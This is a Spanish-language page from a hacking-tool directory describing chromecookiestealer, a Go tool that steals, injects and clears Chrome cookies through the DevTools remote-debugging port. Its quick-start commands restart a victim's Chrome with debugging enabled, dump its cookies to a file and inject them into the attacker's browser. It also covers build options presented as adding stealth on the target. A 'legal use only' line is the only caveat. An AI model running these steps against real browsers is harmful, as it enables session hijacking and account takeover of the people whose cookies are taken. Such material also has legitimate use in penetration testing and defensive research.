Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
chromecookiestealer — Robar/Inyectar cookies de Chrome a través del protocolo DevTools (--remote-debugging-port). | Kitploit
Herramientas/GitHubGitHub/magisterquis/chromecookiestealer
Exfiltración de DatosRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmagisterquis/chromecookiestealer

chromecookiestealer

Robar/Inyectar cookies de Chrome a través del protocolo DevTools (--remote-debugging-port).

Ver Repositorio
115143hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Chrome Cookie Stealer (y inyector)

Se adjunta a Chrome utilizando su protocolo Remote DevTools y roba/inyecta/limpia/elimina cookies.

Muy inspirado por WhiteChocolateMacademiaNut.

Las cookies se vuelcan como objetos JSON usando el propio formato de Chrome. El mismo formato se usa para las cookies a cargar.

Solo para uso legal.

Características

  • Volcar las cookies de Chrome
  • Inyectar cookies volcadas en (otra instancia de) Chrome
  • Limpiar las cookies de Chrome
  • Valores predeterminados configurables en tiempo de compilación

Inicio rápido

Robar las cookies de una víctima:

root@kitploit:~
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json

Inyectar en el navegador local del atacante:

root@kitploit:~
# Inicia Chrome con un puerto de depuración, como arriba.
./chromecookiestealer -clear -inject ./cookies.json

Uso

root@kitploit:~
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name   - Name of the cookies to remove.
url    - If specified, deletes all the cookies with the given name where domain
         and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path   - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

Options:
  -chrome URL
    	Chrome remote debugging URL (default "ws://127.0.0.1:9222")
  -clear
    	Clear browser cookies
  -delete file
    	Name of file containing parameters for cookies to delete
  -dump file
    	Name of file to which to dump stolen cookies
  -inject file
    	Name of file containing cookies to inject
  -no-summary
    	Don't print a summary on exit
  -verbose
    	Enable verbose logging

Compilación

go build debería ser suficiente. Lo siguiente se puede establecer en tiempo de compilación con -ldflags '-X main.Foo=bar' para un poco más de sigilo en el objetivo.

Ninguno de los anteriores está establecido por defecto.

El Protocolo Chrome DevTools es un objetivo en movimiento. Puede ser necesario usar una versión más reciente de las librerías chromedp y cdproto en caso de que este programa deje de funcionar. Esto se puede hacer con

root@kitploit:~
go get -u -v all
go mod tidy
go build

lo que podría tener el efecto secundario de romper todo lo demás.

¯\_(ツ)_/¯

Descargar herramienta
VariableDescripción
DumpFileNombre de un archivo al que volcar cookies. Implica -dump
InjectFileNombre de un archivo desde el cual inyectar cookies. Implica -inject
DeleteFileNombre de un archivo con parámetros que describen cookies a eliminar. Implica -delete
DoClearSi se establece a cualquier valor, implica -clear